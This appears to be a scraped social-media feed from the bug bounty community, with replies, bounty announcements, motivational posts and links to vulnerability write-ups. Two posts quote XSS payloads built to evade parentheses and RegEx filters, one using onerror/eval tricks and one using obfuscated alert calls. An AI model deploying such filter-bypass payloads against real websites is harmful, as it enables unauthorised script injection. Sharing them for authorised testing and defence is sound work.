AR Abdullah

@raslanco_ i found something similar like this. H1 said that there is no impact. if quantities more, they will pay more.

New bug bounty write-up published. How I discovered a business logic flaw in a shopping cart API that allowed bypassing product purchase limits @raslanco/unlimited-shopping-exploiting-a-cart-logic-flaw-to-bypass-product-limits-0c0d26e22672" target="_blank" rel="nofollow noopener">medium.com/@raslanco/unli… #bugbounty #bugbountytips #bugbountytip #infosec #writeups #hackerone

Top 10 #XSS Payloads By @RodoAssis #BugBounty #PenTesting rodoassis.medium.com/top-10-xss-pay…

No matter what your goal is, you will suffer to achieve it. So pick a goal big enough it’s worth suffering for.

@santi_lopezz99 1, duplicate and disappointed 😓

How many bugs did you report this month?

Stop using basic XSS payloads. @RenwaX23 compiled the nastiest collection of parentheses-free XSS eval.apply${[alert\\x2823\\x29]} `Reflect.apply.call`${alert}${undefined}${}`[11] `throw onerror=eval,SyntaxError`alert\\x2823\\x29 Check it out: github.com/RenwaX23/XSS-P…

🔍 Abusing 404 Pages for Endpoint Discovery (The Hidden Recon Technique No One Talks About) Most hackers move on when they hit a 404 page. It just says “Not Found,” right? But here’s the twist sometimes those 404 pages leak information about real endpoints.

@hetmehtaa Yes

Anyone interested in WAF Bypass?

My friend made a very interesting disclosure while searching for vulnerabilities. I personally couldn't believe it when I saw that he was able to make Self-XSS in a Ruby on rails application to RCE. Deserves time to read 👇 @handball10/from-self-xss-to-rce-in-ruby-on-rails-1f9f2d33c1cb" target="_blank" rel="nofollow noopener">medium.com/@handball10/fr…

@wgujjer11 I didn’t learn anything from this article. It is totally vague.

I’ve published my first article on Medium! I hope this write-up is helpful for the cybersecurity community. 🔗 Read here: @wgujjer11/rce-on-a-famous-companys-all-devices-47d1a8093c10" target="_blank" rel="nofollow noopener">medium.com/@wgujjer11/rce… #BugBounty #CyberSecurity #EthicalHacking #Infosec #PenetrationTesting

@galnagli @Hacker0x01 @Bugcrowd One advice for us

2024 was incredible – grateful for everyone who made it special! 🙌 💰 $2,000,000 all-time bounties on @Hacker0x01 💸 2 Mega bounties on @Bugcrowd – $80,000 & $125,000 🏆 Live Hacking Event Awards from Miami, Seattle, Paris, Gdansk, Las Vegas, and Edinburgh 📈 Back to full-time at @wiz_io in an exciting role after scaling my startup @shockwave_sec 🌍 40 flights and millions in miles – fortunate enough to fly first class with @lufthansa ,@emirates & @SingaporeAir Looking ahead… Shifting focus from bug bounty to deeper security & cloud risk research, I found some incredible bugs recently that I can’t wait to share with the community. There’s a lot more to come! 🙂

@NahamSec 🫶

Final giveaway of the year🎁: 4️⃣Hand-On Web Exploitation (Course Only hhub.io/2024holidays) 3️⃣Shodan Codes 2️⃣Caido licenses 1️⃣Hands-On Web Exploitation (Certificate+Course Bundle) To enter drop a 🫶🏼and RT

@techycodec08 @Rhynorater App name?

0-100 in Bug Bounty with a 9-5 job Finally, after 125 Hours of Rigorous testing in 56 days of starting bug bounty from scratch, I received my first bounty that too in 4 digits, in the main domain of one of the largest Public Bug Bounty Programs Way more to go!!!!! @Rhynorater

@_darkcipher_ @Hacker0x01 Bro...write something about this vulnerability.

Duppppp!!!!!!!😐 Bug: Business Logic Errors @Hacker0x01

@techycodec08 @Rhynorater How much do you earn till today?

Day 45: 0-100k in bug bounty with a 9-5 job Today I reported my First BAC Issue, and this time I am pretty confident. In total I tested 29 scenarios today for IDORs and BAC issues. Let's hope for the best. Also, do check my previous post for some cool IDOR Tips. @Rhynorater

@techycodec08 @Rhynorater are you doing anything or just creating posts about bug bounty resources?

Day 37: 0-100k in bug bounty with a 9-5 job Continued Studying for IDOR vulnerabilities form various blog posts and kept improvising my notes. Learnt about different ways to exploit IDOR and how to combine them with other attacks. View Comments for Resources. @Rhynorater

@librarymindset I want to change my life by reading non fiction book. So I read many books but none of the books inspire me. Those books are motivated for a day or two.

Which book completely changed your perspective on life?

@Darshan_Cyber @intigriti @_JohnHammond @gregxsunday any tips?

Subdomain takeover on one target Lot of Fun….. @intigriti #bug #bugbounty260 #bugbounty #intigrity #bug #hacking #Hackingtime

@0x0SojalSec Bounty paisen?

an XSS payload with Alert Obfuscation, for bypass RegEx filters <img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script> #infosec #cybersec #bugbountytip

@_darkcipher_ Vai...2nd secret account korar karon ki jante pari?

Alhamdulillah 🥰 Got bounty from my 2nd secret account😍

@annonimous254z I think you have a Good methodology for hunting. Could you please suggest me as a beginner how to find low hanging bug?